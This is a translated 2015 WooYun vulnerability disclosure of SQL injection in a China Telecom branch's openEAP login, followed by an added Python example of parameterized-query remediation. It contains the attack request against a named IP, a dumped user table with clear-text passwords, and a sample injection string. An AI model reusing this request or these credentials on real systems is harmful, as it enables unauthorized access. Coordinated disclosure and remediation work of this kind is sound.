
Vulnerability summary

Defect ID: wooyun-2015-0136217

Vulnerability title: SQL injection vulnerability in a system of a provincial China Telecom branch

Related vendor: China Telecom

Vulnerability author: 路人甲

Submitted: 2015-08-25 09:16

Fixed: 2015-10-10 20:14

Disclosed: 2015-10-10 20:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org; for questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-25: details reported to the vendor, awaiting vendor handling
2015-08-26: vendor confirmed; details disclosed to the vendor only
2015-09-05: details disclosed to core white hats and relevant domain experts
2015-09-15: details disclosed to regular white hats
2015-09-25: details disclosed to intern white hats
2015-10-10: details disclosed to the public

Brief description:

Because the relevant parameters are not strictly validated, SQL injection is possible, leading to large-scale information leakage.

Detailed description:

openEAP unified login portal: http://222.211.79.137:9080/security/authen
Testing for POST injection:



Payload:
POST /eapsoa/AjaxAdapter HTTP/1.1
Host: 222.211.79.137:9080
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Cookie: JSESSIONID=F6AEB55701EEFD4F3E221E393BCA3E0F; STICK_EAP_TOKEN=OPENEAP_NODE_NAME.
Content-Type: application/x-www-form-urlencoded
Content-Length: 240
<service> <serviceID>SYS_USER_LOGIN_CHECK</serviceID> <parameters><parameter index="1" type="string">username</parameter><parameter index="2" type="string">password</parameter><parameter index="3" type="string"></parameter></parameters> </service>

Proof of vulnerability:

Current database:
web application technology: Servlet 2.4,Tomcat 4.2.2.
back-end DBMS: Oracle
current schema(equivalent to database on Oracle): 'OPENEAP'
OPENEAP database table information:
Database: OPENEAP
[134 tables]
Database: OPENEAP
Table: USERS
[2 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| U_NAME | VARCHAR2 |
| U_PASSWORD | VARCHAR2 |
+------------+----------+
Database: OPENEAP
Table: USERS
[6 entries]
+----------+--------------+
| U_NAME | U_PASSWORD |
+----------+--------------+
| 118114bb | 111111 |
| admin | pcisuntek028 |
| eptel | eptel028 |
| hsbb | hsbb001 |
| lisi | 123456 |
| zhangsan | 123456 |
+----------+--------------+
The accounts use weak passwords; it is recommended to raise the required password complexity.



Fix recommendation:

Add an anti-injection module, or deploy a web application firewall.

Copyright notice: when reposting, please credit the source: 路人甲@乌云
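An added example (not code from this report or from the affected openEAP product) of the code-level fix that belongs alongside these recommendations: the SYS_USER_LOGIN_CHECK lookup rebuilt with bound parameters, so that values taken from the <service> request body are never parsed as SQL. It assumes an in-memory SQLite table standing in for Oracle's OPENEAP.USERS, constructed sample rows, and a hypothetical parser for the request format shown above.

```python
import sqlite3
import xml.etree.ElementTree as ET

# Constructed request body in the <service> format from the report; the
# second parameter carries a textbook injection string for the comparison.
SAMPLE_REQUEST = """<service><serviceID>SYS_USER_LOGIN_CHECK</serviceID>
<parameters><parameter index="1" type="string">admin</parameter>
<parameter index="2" type="string">' OR '1'='1</parameter>
<parameter index="3" type="string"></parameter></parameters></service>"""


def parse_service_request(body):
    """Return (serviceID, [parameter values ordered by index]) from a <service> body."""
    root = ET.fromstring(body)
    service_id = root.findtext("serviceID")
    params = sorted(root.iter("parameter"), key=lambda p: int(p.get("index")))
    return service_id, [p.text or "" for p in params]


def make_db():
    """In-memory SQLite stand-in for OPENEAP.USERS with a constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (U_NAME TEXT, U_PASSWORD TEXT)")
    conn.execute("INSERT INTO USERS VALUES ('admin', 'correct-horse-battery')")
    return conn


def login_check_vulnerable(conn, username, password):
    """String concatenation: request text becomes part of the SQL syntax."""
    sql = ("SELECT COUNT(*) FROM USERS WHERE U_NAME = '%s' AND U_PASSWORD = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_check_fixed(conn, username, password):
    """Bound parameters: the driver sends values separately, never as SQL.
    (Passwords should also be stored hashed, not in clear text as in the dump.)"""
    sql = "SELECT COUNT(*) FROM USERS WHERE U_NAME = ? AND U_PASSWORD = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def run_demo(body=SAMPLE_REQUEST):
    """Run the same request through both implementations and report the outcome."""
    service_id, params = parse_service_request(body)
    if service_id != "SYS_USER_LOGIN_CHECK":
        raise ValueError("unexpected serviceID: %r" % service_id)
    conn = make_db()
    username, password = params[0], params[1]
    return {"vulnerable": login_check_vulnerable(conn, username, password),
            "fixed": login_check_fixed(conn, username, password)}
```

With the sample body, the concatenated query authenticates without a valid password while the parameterized query rejects it, which is the behaviour a WAF can only approximate.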


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-26 20:12

Vendor reply:

CNVD confirmed and reproduced the reported issue; it has been forwarded via CNCERT to China Telecom Group Corporation, which will coordinate handling with the website's management department.

Latest status:

None yet